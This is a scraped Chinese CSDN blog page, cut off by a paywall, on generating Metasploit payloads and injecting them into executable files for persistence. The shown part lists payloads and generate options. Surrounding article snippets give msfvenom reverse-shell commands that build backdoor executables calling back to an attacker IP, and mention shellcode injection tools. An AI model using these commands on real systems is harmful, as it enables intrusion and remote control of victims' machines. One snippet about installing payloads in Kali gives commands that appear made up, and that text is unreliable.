msf生成payload并注入到可执行程序exe中

最新推荐文章于 2025-02-28 15:08:07 发布
最新推荐文章于 2025-02-28 15:08:07 发布
阅读量5.7k 收藏 14
点赞数 2
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/redwand/article/details/107503304
版权
前言

msfconsole下的generate与msfvomen命令实际是不同环境下的同一个命令,其功能基本相同,这里我们要学习的重点是使用-k -x 选项将payload注入到可以执行文件exe中,这项技能在实战中后渗透测试的可持久化中经常会被用到。

一、msf命令提示符下generate命令生成

1、首先可以使用show payloads命令查看所有的payload,然后使用use命令选中其中一个。

msf5 > show payloads

Payloads
========

   #    Name                                                Disclosure Date  Rank    Check  Description
   -    ----                                                ---------------  ----    -----  -----------
   0    aix/ppc/shell_bind_tcp                                               manual  No     AIX Command Shell, Bind TCP Inline
   1    aix/ppc/shell_find_port                                              manual  No     AIX Command Shell, Find Port Inline
   2    aix/ppc/shell_interact                                               manual  No     AIX execve Shell for inetd
   3    aix/ppc/shell_reverse_tcp                                            manual  No     AIX Command Shell, Reverse TCP Inline
   ...
   ...
   559  windows/x64/vncinject/reverse_tcp_uuid                               manual  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
   560  windows/x64/vncinject/reverse_winhttp                                manual  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
   561  windows/x64/vncinject/reverse_winhttps                               manual  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)

2、使用generate -h查看命令帮助

msf5 payload(windows/shell_bind_tcp) > generate -h
Usage: generate [options]

Generates a payload. Datastore options may be supplied after normal options.

Example: generate -f python LHOST=127.0.0.1

OPTIONS:

    -E        Force encoding
    -O <
最低0.47元/天 解锁文章
msfvenom生成payload参数讲解
afei001
03-21 876
metasploit更新后去除了msfencode和msfpayload推出了全新的生成器:msfvenom msfvenom参数讲解 root@kali:~# msfvenom -h MsfVenom - a Metasploit standalone payload generator. Also a replacement for msfpayload...
使用MSF生成的shellcode打造免杀payload
热门推荐
MickeyMouse1928的博客
05-04 1万+
环境: 1.Kali攻击机IP:192.168.114.140 2.使用win7生成exe 步骤: 使用msfvenom生成shellcode : msfvenom -pwindows/meterpreter/reverse_http lhost=192.168.114.140 lport=5555 -f c win7中使用Visual studio创建Win32控制台
【渗透测试笔记】之【MSF 生成payload
AA8j的博客
11-07 841
生成payload # 查看所有payloads show payloads # 查看windows可用(输完按两下回车) use payload/windows/ # 使用绑定端口payload msf5 > use payload/windows/shell_bind_tcp # 查看payload编码,里面可能含有“坏字符” msf5 payload(windows/shell_bind_tcp) > generate # 对坏字符编码(默认自动选择一个最合适的encoder,也可以手动指
payload提取boot.img教程
最新发布
2301_79100880的博客
02-28 534
payload.bin用payload_dumper.exe打开(鼠标左键长按payload.bin移到payload_dumper.exe就会显示打开选项)解压后会有一个exe的文件,创建一个文件夹,将下面两个文件放到同一个文件夹里。等待程序自动提取就行了,boot.img在文件夹里。一、下图是提取过程(教程全程无脑)下载payload_dumper。下载完会得到下面这样一个文件。
msfvenom常用脚本生成
03-19 395
1、 Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe 2、Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> ...
msf generate exec payload
weixin_33947521的博客
07-03 490
daniel@daniel-mint ~/msf/metasploit-framework $ ruby msfpayload windows/exec CMD=calc.exe N WARNING: Nokogiri was built against LibXML version 2.8.0, but has dynamically loaded 2.9.1 # windows/exe...
Metasploit (MSF) 使用生成木马payload
2301_79642494的博客
10-29 2342
show: 查看选项 //当进入模块可是使用show option查看模块需要的参数选项,使用show targets和show payloads可查看target和payload选项参数。若出现handler failed to bind to说明该端口已经被占用,此时要把靶机的木马文件删除重启靶机(因为木马一旦运行就不会停止,一直占用端口),再从头开始建立木马。如果需要退出删除session会话可以使用session -k 会话号,同样使用-K可以删除全部session会话。
生成msf常用payload
hl1293348082的专栏
04-07 2954
msf作为一款强大的漏洞检测工具,如何生成适用于msfpayload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。 在kali下可以使用如下命令列出MSFVenom可以生成payload列表: msfvenom -l 正在上传…重新上传取消 生成二进制文件 关于二进制文件,主要介绍适用于Windows、linux、mac操作系统的payload生成与利用。 Windows ms
MSF恶意程序利用+CS上线
dream2662583的博客
10-19 524
我是dream,我在新课程培训学习网安方面的知识,下面是关于msf恶意程序利用以及CS的内容。
msfvenom-shll生成工具是msf 组件——Metasploit(MSF)使用详解
代码审计
04-22 2602
抽离 专职生成对应的payload异或编码 -e x86/shikata_ga_nai -i 3linux 生成 payloadphp 生成 payloadpython 生成 payloadwindows 生产payload 抽离 专职生成对应的payload 异或 编码 免杀 msfvenom -l platforms 支持平台 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.142 lport=55212 -f
使用MSF生成shellcode
weixin_34092455的博客
04-02 1123
使用MSF生成shellcode payload和shellcode的区别 Payload是是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码。因为Payload是包含在ShellCode中的,ShellCode是真正的被输入到存在漏洞的程序中的,且ShellCode负责把程序的流程最终转移到你的Payload代码中。所以对于一个漏洞来说,ShellCode就...
将代码注入exe文件
02-26
VC下将自己的代码注入PE文件,模仿病毒入侵exe文件,有说明文档、源代码,极具学习价值!!!!
远程线程注入工具,可生成代码 可自定义shellcode注入进程-易语言
06-14
程序界面,可自定义任意shellcode 注入任意进程 此程序自带将msf的远控shellcode转换成 易语言 可调用的shellcode 同时还可以将注入的功能生成出自己的程序可调用的代码 双击第三个输入框即可生成shellcode,这里默认的shellcode是远程线程注入 注入的是当前程序选择注入的进程 这里选择最左下角的选项,然后再双击输入框 即可生成在自身程序执行的shellcode 这里说明一下哈,这里是可以自定义shellcode进行注入的,不是必须使用msf生成的shellcode进行注入 这里将自己扣出来的shellcode放在第一个输入框就行了,十进制的机器码之间以半角符逗号分隔开 生成的shellcode给自己的代码调用 记得要配合上 精易模块 进行使用 当然了 也可以自己手动补dll进去 以下为关键代码的截图 使用易语言好几年了,从最初的进厂打工(满心的无奈) 到现在的安全工程师,易语言是带我入门的语言 也是我至今最喜欢的语言之一 易语言对于我来说更多的是一种说不上来的感觉 对于我来说易语言是有生命的 也是易语言赐予了我入门这行的基础(很扎实很扎实) 此工具是前两天匆忙写出来的,如果有哪里做的不够好以及觉得此程序很烂的大佬们不要喷我 以下为下载地址 此程序使用了精易模块以及未闻花名的 皮肤模块
msf下的各种生成payload命令
weixin_48450741的博客
06-15 387
msf下的各种生成payload命令 来自 : https://www.cnblogs.com/backlion/p/6000544.html
msf生成payload过滤
Catch me if you can
04-25 2196
坏字符过滤 使用msf generate模块来过滤
MSF 下域内渗透
A_991128a的博客
03-15 376
先获取域内机器sessionrun get_local_subnets //获取本地网络子网掩码route add 192.168.233.0 255.255.255.0 1 //添加路由表run autoroute -s 192.168.2.0 -n 255.255.255.0 //也可以添加一条静态路由run autoroute -s 192.168.2.0/24 //添加动态路由route print //打印路由表。
Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用
Alone hackers的博客
03-06 5756
Metasploit (MSF) 使用:包含基本使用,payload生成,后渗透模块使用。
Metasploit (MSF) 使用-包含基本使用、payload生成、后渗透模块使用
dzqxwzoe的博客
02-29 1871
l, --list 列出指定模块的所有可用资源,包括:payloads,encodes,nops,all-p, --payload 指定所需要使用的payload,也可以使用自定义payload,几乎支持全平台-f, --format 指定输出格式-e, --encoder 指定需要使用的encode,指定需要使用的编码。
MSF --Windows系统后门之exe文件
Kevin's Blog
04-28 2020
文章目录一、环境二、操作2.1 攻击者操作2.2 受害者操作 以下所有的内容仅供网安学习参考,非法攻击他人计算机应后果给予法律制裁!!! 一、环境 Windows 2008 R2(虚拟机,受害者,192.168.7.131) Kali(虚拟机,攻击者,192.168.7.129) 二、操作 2.1 攻击者操作 目的:给windows账户留个后门,这里未提供免杀操作 》》前提MSF能够...
kali中如何安装msfpayload
09-20
在Kali Linux中安装Metasploit Framework(MSF)的payloads(攻击载荷),你可以按照以下步骤操作: 1. **更新系统**: 首先确保你的Kali系统是最新的,打开终端输入: ``` sudo apt-get update && sudo apt-get upgrade ``` 2. **安装Metasploit**: 如果你还没有安装Metasploit,可以使用apt-get命令来安装它: ``` sudo apt-get install metasploit-framework ``` 安装完成后,运行`msfconsole`启动Metasploit框架。 3. **加载payloads**: 启动metasploit后,在提示符下输入: ``` msf > use auxiliary/scanner/payload msf auxiliary(scanner/payload) > show payloads ``` 这将显示所有可用的payload列表。选择你需要的payload,通常需要输入其名称的一部分,例如如果你想安装Windows的meterpreter payload,输入: ``` msf auxiliary(scanner/payload) > search windows/meterpreter ``` 系统会列出相关的payload,找到合适的后输入`use`命令加上payload名来安装。 4. **安装特定payload**: 例如,如果你想要安装`windows/x64/meterpreter/reverse_tcp`,输入: ``` msf auxiliary(scanner/payload) > use windows/x64/meterpreter/reverse_tcp msf auxiliary(scanner/payload) > fetch ``` `fetch`命令用于下载payload文件到本地。 5. **确认安装**: 下载完成后,查看`current`选项确认payload是否已成功添加: ``` msf auxiliary(scanner/payload) > options ``` 现在你应该可以在Metasploit的auxiliary模块中看到刚才安装的payload了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值